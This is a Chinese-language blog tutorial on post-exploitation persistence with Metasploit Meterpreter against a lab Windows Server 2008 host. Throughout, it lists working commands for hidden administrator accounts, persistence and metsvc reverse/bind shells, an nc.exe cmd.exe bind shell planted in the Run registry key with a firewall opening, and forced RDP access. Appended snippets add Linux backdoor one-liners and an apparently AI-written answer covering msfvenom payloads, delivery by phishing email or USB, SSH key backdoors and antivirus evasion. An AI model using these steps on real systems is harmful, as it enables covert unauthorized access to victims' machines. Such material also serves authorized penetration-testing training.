12.3、后渗透测试--持久化后门

最新推荐文章于 2025-04-14 11:50:48 发布
最新推荐文章于 2025-04-14 11:50:48 发布
阅读量3.5k 收藏 43
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全 文章标签: metasploit meterpreter 持久化后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/leiwuhen92/article/details/128303712
攻击主机: Kali 192.168.11.106
靶机:windows server 2008 r2   192.168.11.134
 

零、为何要创建后门

当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如 重新启动计算机,此时使用后门将允许自动重新与目标系统建立连 接, 不必每次都需要进行攻击取得 meterpreter 为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门的几种方式。
前提: 获得 meterpreter shell
创建后门的几种方式:
  1. 靶机创建隐藏用户,后期可直接使用隐藏用户登录目标主机;
  2. 通过persistence脚本安装后门;
  3. 通过metsvc服务的方式;
  4. 持久化后门netcat
  5. 通过开启远程桌面

一、靶机创建隐藏用户

1、进入靶机 
meterpreter > shell
2.创建用户 注意这里用户使用了$符号,可以起到隐藏创建用户的目的
C:\Windows\system32>  net user hacker$ Hacker_123  /add
3、将创建的用户添加到管理员组
C:\Windows\system32>  net localgroup administrators hacker$  /add
net user查看不到hacker$用户,但在靶机上还是能看到你创建的这个隐藏用户:

 可以使用hacker$/Hacker_123这个用户登录到靶机。

二、通过persistence脚本安装后门

路径:  metasploit/scripts/meterpreter/persistence.rb  ,用于创建通过启动项启动。会创建注册表,创建文件,  很容易被杀软拦截 
帮助文档:
1、执行 run persistence -S -U -X  -i  5 -p 8888 -r  192.168.11.106  这样靶机在系统登陆,用户登陆,开机,使用中每隔5秒都 会自动连接攻击机 192.168.11.106 8888 端口,缺点是容易被杀毒软件查杀
2、执行结束后,会在靶机 的C:/windows/Temp/下建立一个vbs文件( 持久脚本 ),该脚本会 自动在靶机上运行,同时 添加注册表键值 ,如下 :
3、我们下次可直接在kail攻击机器上使用下面的漏洞利用模块和攻击载荷攻击,获取靶机的meterpreter, 必须先 将靶机重启
kail攻击机器输入如下指令:
> use exploit/multi/handler
> set payload windows/meterpreter/reverse_tcp
> set LHOST 192.168.11.106
> set LPORT 8888    #    端口要和上面的persistence后门端口一致
> run
运行后,可以成功获得meterpreter shell:

三、通过metsvc服务的方式

路径:  metasploit/scripts/meterpreter/metsvc.rb  ,用于创建服务启动。会创建名为meterpreter的服务 ,并 在C:\Users***\AppData\Local\Temp\上传三个文件 (metsrv.x86.dll、metsvc-server.exe、metsvc.exe)   很容易被杀软拦截,且安装服务需要管理员权限 
1、运行 run metsvc将会在靶机上以Meterpreter服务的形式注册到服务列表中,并开机自动启动。
运行 run metsvc -r卸载靶机上的Meterpreter服务。
查看服务已启动:
查看进程:
端口也是启动的状态:

 这些说明靶机上已经开始监听31337端口了。

2、我们下次可直接在kail攻击机器上使用下面的漏洞利用模块和攻击载荷攻击,获取靶机的meterpreter, 必须先 将靶机重启
kail攻击机器输入如下指令:
> use exploit/multi/handler
set payload windows/metsvc_bind_tcp  指定的木马模块
set RHOST 192.168.11.134   # 靶机IP
> set LPORT 31337    # 靶机上监听的端口值31337
> run
这里一直会话每次刚创建成功就会断开, 推测是 run metsvc 被舍弃了,建议使用 exploit/windows/local/persistence。
使用 exploit/windows/local/persistence
必须先重启靶机,然后再kail攻击机器输入如下指令:
> use exploit/multi/handler
set payload  windows/meterpreter/reverse_tcp  
set LHOST 192.168.11.106  # 设置kail攻击机IP
> set LPORT 4444    # 跟 exploit/windows/local/persistence设置的LPORT相同
> run
运行后,可以成功获得meterpreter shell:

四、持久化后门netcat

nc(全称是netcat)是一个用于TCP/UDP连接和监听的linux工具。nc的实现版本大致有两种,一种是带有-e或-c 选项可以直接给出执行命令,另一种不支持-e选项。
ncat是nmap项目的一部分,在安装nmap的时候会自动安装ncat。ncat是对netcat的重新实现和升级,而且功能更加强大(如ssl加密、代理连接通过socks4 获取http)
nc的监听模式在kali下会出现问题,监听的端口会发生变化,因此推荐同学们在kali下使用ncat
1.1、 上传nc.exe至目标主机
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32  C:\\windows\\system32下的文件都有system权限(最高权限)
验证是否上传成功   ls C:\\windows\\system32 | grep nc.exe
execute -f  C:\\windows\\system32\\nc.exe -h
1.2、注册表自启动程序设置 
枚举查看注册表启动项
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
靶机上注册表该项的确没有任何值:
将nc.exe设置到注册表启动项中
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -ldp 4455 -e cmd.exe'
  • -L 选项或-l选项是将nc设置为监听模式;
  • -p 选项指定监听的端口(混淆为80,53等端口往往能穿透防火墙);
  • -e 选项可以绑定到cmd.exe这个shell程序。
查看以确定nc已经被设置到注册表启动项中
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc
1.3、设置防火墙模式
打开cmdexecute -f cmd -i
当前防火墙操作模式 :netsh firewall show opmode
将nc开放的端口4455加入到目标系统防火墙规则中,入站 netsh advfirewall firewall add rule name=ncport4455  dir=in protocol = tcp action=allow localport=4455
查看目标系统防火墙端口开放状态: netsh firewall show portopening
1.4、nc连接靶机
在kail攻击机上: nc -v 192.168.11.134 4455
靶机重启后,页面弹出:
此时在kail攻击机上: nc -v 192.168.11.134 4455,ok

五、通过开启远程桌面

# 强制开启目标主机远程桌面并自动添加用户名为metasploit密码为 Meterpreter_123 的用户
run getgui -u metasploit -p Meterpreter_123 
# 上面命令会生成清理痕迹的ruby的脚本文件,位置在/root/.msf4/logs/scripts/getgui/clean_up_xxxxx.rc
# 当操作完目标用户后可以使用此脚本清理痕迹、关闭远程桌面服务和删除创建的用户
run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20221207.0010.rc
模块已舍弃,建议使用模块 run post/windows/manage/enable_rdp
靶机上查看用户:

 

在kail攻击机器上远程登录靶机: rdesktop -u metasploit -p Meterpreter_123 192.168.11.134:3389

六、参考

meterpreter 持久后门
01-02 826
创建持久后门 当成功获取目标系统的访问权限后,需要寻找方法来恢复与目标主机的连接,而无需再进入目标系统。如果目标用户破坏了该连接,例如重新启动计算机,此时使用后门将允许自动重新与目标系统建立连接。为了后续渗透方便,所以需要创建一个后门。这样,即使连接被中断,也不会影响工作。下面将介绍创建持久后门。创建持久后门的具体操作步骤如下所示。 (1)激活Meterpreter会话。执行命令如下...
域内持久化后门
hongduilanjun的博客
11-01 563
可以使用krbtgt的NTLM hash创建作为任何用户的有效TGT。要伪造黄金票据的前提是知道域的SID和krbtgt账户的hash或者AES-256值。
掌握Meterpreter后门与MITM攻击技巧
weixin_31185473的博客
04-14 304
本文详细介绍了如何使用Meterpreter设置持久后门,并通过中间人攻击(MITM)来窃听目标主机与合法方之间的通信。通过具体的操作步骤和实践,揭示了网络安全中后门设置与信息窃取的实战技术。
MSF之Persistence后门
weixin_46104215的博客
09-27 3281
Persistence:一款使用安装自动方式的持久后门程序,可以利用它创建注册和文件 一、实验环境 攻击主机:2021 Kali (ip:192.168.110.130) 靶机:win7(专业版) (ip:192.168.110.134) 准备:先通过攻击获取一个 meterpreter shell(之前的文章中有介绍的 ms17-010漏洞) 二、实验步骤 1.获得 meterpreter shell 之后,输入 run persistence -A -S -U...
linux 持久化后门
luguifang2011的专栏
01-18 3270
前言 收集复现下网上linux后门姿势,一起学习下。 这张图特别好 添加超级用户 某些情况下是没有回显的,可以用一句话直接添加用户 1、useradd guest;echo 'guest:123456'|chpasswd 2、useradd -p `openssl passwd 123456` guest 3、useradd -p "$(openssl passwd 12...
Linux持续化后门
小晓晓晓林的博客
02-20 3398
Linux权限维持 环境:Centos7、Kali虚拟机等 1、增加超级用户 useradd -p `openssl passwd -1 -salt 'salt' 123456` test -o -u 0 -g root -G root -s /bin/bash -d /home/test 通过命令创建了test 123456的超级用户 2、unix bash远...
在Android中使用带有shell脚本的Kali Linux的持久后门
HTTPPTTH的博客
03-23 1002
此外,如果目标系统与我们在同一局域网中,或者我们拥有静态 IP,那么持久性将会一直存在于局域网或者广域网中,这也是我们需要注意的一个问题。在破解 Android 设备时,可以使用多种方法,但是一旦获得了meterpreter会话,该会话并不是持久的,需要将一个 shell 脚本上传到/sdcard目录的任何位置来实现持久后门。因此,我们需要使用另一种方法,即使用shell命令在/sdcard目录下上传一个后门,并执行脚本,该脚本会自动在该 Android 设备中创建持久后门。之后,需要在终端中输入“
Delphi 12.3 控件之RDOpenAI-demo-source.rar源代码
03-12
Delphi 12.3 控件之RDOpenAI-demo-source.rar源代码是针对使用Delphi开发环境的开发者提供的一个示例项目,它展示了如何集成和使用RDOpenAI控件。Delphi是一种广泛使用的集成开发环境(IDE),它允许开发者快速构建...
Delphi 12.3控件之DevExpressVCLProductDemos-24.2.3.rar
03-24
Delphi 12.3控件之DevExpressVCLProductDemos-24.2.3.rar
Delphi 12.3控件之UniGUI-1597(完整版 安装工具) DC.rar
03-26
Delphi 12.3控件之UniGUI_1597(完整版 安装工具) DC.rar
Delphi 12.3控件之DBISAM-450b6-xe11-12.7z
03-27
Delphi 12.3控件之DBISAM_450b6_xe11_12.7z
Delphi 12.3控件之uniGUI-1.95.0.1599.7z
最新发布
05-14
Delphi以其高效的编译器、可视化开发环境以及丰富的组件库而闻名,特别是在Windows平台下的应用程序开发中拥有广泛的用户基础。版本12.3是Delphi的一个较新版本,它标志着Embarcadero对Delphi功能的不断更新和改进。...
linux持久化
HoAd'blog
08-25 1897
linux持久化后门添加超级用户SUID shellalias 后门inetdcrontab后门ssh公钥免密ssh软连接SSH wrapper后门PAM隐身登录隐藏文件Git hooksPROMPT_COMMAND后门PROMPT_COMMAND提权Sudoers “trick”TCP Wrappers进程注入其他一些小技巧bash去掉history记录修改上传文件时间戳伪造Apache日志中的指定IPLinux日志清除 添加超级用户 echo "user:x:0:0::/:/bin/sh" >&g
持久化:利用Linux PAM创建后门
qq_68163788的博客
02-19 1837
PAM(Pluggable Authentication Modules)是Linux系统中用于身份验证的模块化框架。通过利用PAM,可以创建一个后门来绕过系统的认证机制,从而获得未经授权的访问权限。 要创建一个后门,首先需要编写一个自定义的PAM模块,该模块可以在用户登录时执行特定的操作,例如绕过密码验证或者添加一个额外的认证方式。接着,将这个自定义的PAM模块加载到系统中,并配置PAM以在用户登录时使用该模块。 通过这种方式,攻击者可以在系统中创建一个隐藏的后门,同时绕过正常的认证流程,
持久化:Linux利用SUID、任务计划、vim进行权限维持
qq_68163788的博客
02-17 1452
以利用SUID(Set User ID)权限来实现权限维持。通过设置SUID权限,用户可以以文件所有者的身份执行该文件,从而获取文件所有者的权限。这样可以帮助攻击者在系统中保持持久权限。另外,任务计划(Cron Jobs)也是一种常见的权限维持方法。攻击者可以通过创建定时任务,定期执行恶意脚本或程序来维持权限。此外,vim编辑器也可以被用来进行权限维持。攻击者可以利用vim编辑器的漏洞来提升自己的权限或执行恶意代码。
渗透测试实战之WMI持久化记录
anquanzushiye的博客
02-01 1724
0x00 背景WMI(Windows Management Instrumentation,Windows 管理规范)是一项核心的 Windows 管理技术;用户可以使用 WMI 管理本...
Kali 中 Persistence后门的使用
大方子
09-02 3673
这里我就用最经典的漏洞ms08_067进行演示   靶机:192.168.193.128 攻击机:192.168.193.135   这里我就省去ms08_067漏洞的使用过程,直接讲当ms08_067拿到shell之后的操作   这里我们已经拿到权限了   然后执行 run persistence -S -U -X -i 5 -p 446 -r 192.168.193.13...
metasploit---创建后门
孤的博客
11-22 857
后门技术来维持对被攻击系统的访问。后门可帮助攻击者维持系统访问,并使攻击者无须重复地实施攻击就能随意使用被攻击系统。后门就是就是绕过正常的计算机机制,获取计算机访问权限的方法。 常见EXE后门 metasploit提供了三个辅助工具来创建payload后门,分别是msfpayload、msfencode以及msfvenom,不过现在只有msfvenom(里面集成了msfpayload和msfenc...
后渗透
weixin_30241919的博客
09-02 479
MSF后渗透包括:提权,进程迁移,令牌假冒,获取凭证,操作文件系统,系统其它操作,端口转发和内网代理,后门 提权 通常webshell的权限都比较低,能够执行的操作有限,没法查看重要文件、修改系统信息、抓取管理员密码和hash、安装特殊程序等,所以我们需要获取系统更高的权限。 绕过UAC 用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助...
kali后门设置
03-09
<think>好的,我现在需要回答用户关于如何在Kali Linux中设置后门的问题。首先,我得确保自己正确理解用户的需求。用户可能想了解渗透测试中常用的后门设置方法,用于安全评估。需要注意的是,这些技术只能用于合法授权的测试,未经允许使用是非法的。 接下来,我应该回忆Kali Linux中常用的工具。Metasploit Framework 是最常用的渗透测试工具之一,生成Payload和设置监听器是常见做法。还有像MSFVenom这样的工具可以生成不同类型的后门程序。此外,SSH后门也是一种常见方法,通过添加授权密钥或修改配置保持访问权限。 然后,我需要考虑用户可能的疑问点。比如,如何生成Payload,如何设置监听器,如何维持持久访问,以及如何避免被检测。同时,用户可能对后门的类型和适用场景不太清楚,需要简要说明。 根据提供的引用内容,引用[1]提到了SSH隧道和端口转发,引用[3]和[4]涉及Metasploit的使用,这可能与生成Payload有关。引用[4]提到MS12-020漏洞,但用户的问题是关于后门设置,所以重点可能在Metasploit的利用模块和后门生成。 现在,我需要整理步骤。首先使用MSFVenom生成Payload,然后设置Metasploit的监听器。接着,通过执行Payload获得反向连接。另外,SSH后门的方法也是可行的,比如添加SSH密钥或修改sshd配置。最后,可能需要考虑持久化机制,如cron任务或启动脚本。 需要注意的是,每个步骤都需要具体命令示例,并且提醒用户合法使用的必要性。此外,生成的相关问题应围绕后门检测、加固措施、持久化技术和其他工具方法展开。 检查是否有遗漏点,比如Payload的类型(如exe、Python脚本等),以及如何将后门传播到目标机器。用户可能需要知道如何诱使目标执行Payload,但这可能超出当前问题范围,但可以简要提及。 最后,确保回答结构清晰,分步骤说明,代码块正确使用$$格式,引用正确标注。例如,Metasploit的安装和启动命令来自引用[3],SSH隧道的例子来自引用[1]。 总结回答应包括:生成Payload、设置监听器、执行Payload、持久化后门(SSH方法)、注意事项和相关问题。</think>### Kali Linux中设置后门的步骤 在Kali Linux中设置后门通常用于渗透测试的权限维持阶段,以下是两种常见方法: --- #### **方法1:使用Metasploit生成反向Shell后门** 1. **生成Payload** 使用`msfvenom`创建恶意程序(如可执行文件或Python脚本): ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=<攻击者IP> LPORT=<监听端口> -f exe > backdoor.exe ``` 参数说明: - `-p`: 指定Payload类型(如`windows/meterpreter/reverse_tcp`) - `LHOST/LPORT`: 攻击者的IP和监听端口 - `-f`: 输出格式(如`exe`、`python`等)[^3][^4]。 2. **设置Metasploit监听器** 启动Metasploit并配置反向TCP处理模块: ```bash msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <攻击者IP> set LPORT <监听端口> exploit ``` 此步骤等待目标机器执行后门程序并建立连接[^3][^4]。 3. **触发后门** 将生成的`backdoor.exe`通过钓鱼邮件、U盘等方式投放到目标机器并执行。成功后,攻击者会获得Meterpreter会话,可执行文件操作、键盘记录等。 --- #### **方法2:SSH后门(适用于Linux目标)** 1. **添加SSH公钥** 在目标机器的`~/.ssh/authorized_keys`文件中插入攻击者的公钥: ```bash echo "ssh-rsa <攻击者公钥>" >> ~/.ssh/authorized_keys ``` 此后可通过`ssh user@目标IP`直接登录[^1]。 2. **修改SSH服务配置** 编辑`/etc/ssh/sshd_config`,启用以下选项以维持持久访问: ```bash PermitRootLogin yes PasswordAuthentication yes ``` 重启SSH服务:`systemctl restart sshd`。 --- #### **注意事项** - 后门程序可能被防病毒软件检测,需进行混淆或加密(如使用`Veil-Evasion`工具)。 - 所有操作需在合法授权范围内进行,禁止非法使用[^3]。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值